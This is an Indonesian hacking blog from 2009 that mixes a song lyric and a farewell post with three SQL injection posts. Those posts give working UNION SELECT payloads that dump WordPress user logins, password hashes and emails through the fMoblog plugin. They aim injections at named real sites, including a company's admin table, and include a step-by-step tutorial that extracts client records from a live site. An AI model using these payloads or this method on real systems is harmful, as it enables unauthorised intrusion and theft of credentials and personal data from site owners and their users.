Pindahan

Akhirnya pindah juga ke website baru, oleh karena itu saya tidak lagi memposting di blog ini. Walau demikian, blog ini tidak akan saya hapus :)

9/04/2009 04:18:00 PM | | 0 Comments  

Jangan Menyerah

bosen nyari exploit, jiwa gue lg nge-drop, gue mo nyanyi lagunya D'Nasib, ups.. D'Masiv.

D’Masiv – Jangan Menyerah

tak ada manusia
yang terlahir sempurna
jangan kau sesali
segala yang telah terjadi

kita pasti pernah
dapatkan cobaan yang berat
seakan hidup ini
tak ada artinya lagi

reff1:
syukuri apa yang ada
hidup adalah anugerah
tetap jalani hidup ini
melakukan yang terbaik

tak ada manusia
yang terlahir sempurna
jangan kau sesali
segala yang telah terjadi

reff2:
Tuhan pasti kan menunjukkan
kebesaran dan kuasanya
bagi hambanya yang sabar
dan tak kenal putus asa

8/20/2009 05:53:00 PM | | 0 Comments  

Wordpress Plugin fMoblog Remote SQL Injection Vulnerability 

#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################

# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

##############################################################
# Greetz: str0ke and milw0rm.com
##############################################################


POC:
http://www.evilredduck.com/?page_id=7&id=-30+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass,0x3a,user_email%29,6+from+wp_users--
http://www.rantbox.org/?page_id=590&id=-18+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass,0x3a,user_email%29,6+from+wp_users--


note: sql version 5.x.x

8/19/2009 04:38:00 PM | | 0 Comments  

Bugs di perusahaan IT 


http://www.teledata.co.id/news_detail.php?nid=-10%20union%20all%20select%201,GROUP_CONCAT%28username,password,full_name,create_date,last_update%29,3,4%20FROM+iters_users--

wow,,, admin-nya seorang wanita, suit suit... sibuk ke salon kali ya ampe lupa update website-nya. Moso' last update 1 tahun yg lalu, ck ck ck ...

inspired by vyc0d

8/19/2009 11:41:00 AM | | 0 Comments  

injek siqil for dummies

Dork:

news.php?id=
Target:
box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media

beri tanda petik (‘)
http://www.boxclever.ca/news.php?id=92’
muncul error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
berarti site ini Vuln, setelah terdapat error seperti di atas gunakan perintah ORDER BY untuk panjang column, dan jangan lupa gunakan “--“ di belakang angka yang di masukan.

box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
tidak menampilkan eror, coba gunakan order by 6

http://www.boxclever.ca/news.php?id=...der%20by%206--
ternyata muncul error:
Unknown column '6' in 'order clause'

order by 6 site mengeluarkan error seperti Unknown column ‘6’ in 'order clause' berarti panjang column tidak sampai 6

box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
udah ga muncul error.

Tambahkan tanda “-” didepan angka 92 dan gunakan perintah UNION+ALL+SELECT+1,2,3,4,5--
box clever ::: news ::: 3 ::: intelligent digital media
muncul angka ini:

3
1
4
Ganti angka 3 atau 1 atau 4 dengan version(). Saya gantikan angka 3.
box clever ::: news ::: 5.0.51a-log ::: intelligent digital media
muncul:
5.0.51a-log
Berarti sql Version 5

setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA= DATABASE()-- di belakang column, perintah tersebut untuk mengetahui nama nama table pada database;)
box clever ::: news ::: client_info,contact,customersurvey,featured_projec t,news,project,project_level,project_status,projec t_type,provinces,rfp,uploads ::: intelligent digital media
muncul:

client_info,contact,customersurvey,featured_projec t,news,project,project_level,project_status,projec t_type,provinces,rfp,uploads
konversi client_info ke hexadecimal = 636c69656e745f696e666f
box clever ::: news ::: client_id,client_name,client_street,client_city,cl ient_province,client_pc,client_notes ::: intelligent digital media
muncul:

client_id,client_name,client_street,client_city,cl ient_province,client_pc,client_notes
box clever ::: news ::: +�cole Rudolph Hennig School9512 - 92 St.Fort SaskatchewanABT8L 1L7Peter & Judy,+ParagondsdsaadsEdmontonABdsadsdadsadsads,+Ro cky Point EngineeringsadasdNanaimoBCdsaadssadsadads,+Drive By PunchsadsdsaLeducABdsdsadsdssaasdadsasd

I got information :)

8/12/2009 05:04:00 PM | | 0 Comments  

Langganan: Postingan (Atom)


Statistics

Counter online counter Page Rank Check TopOfBlogs

100 Blog Indonesia Terbaik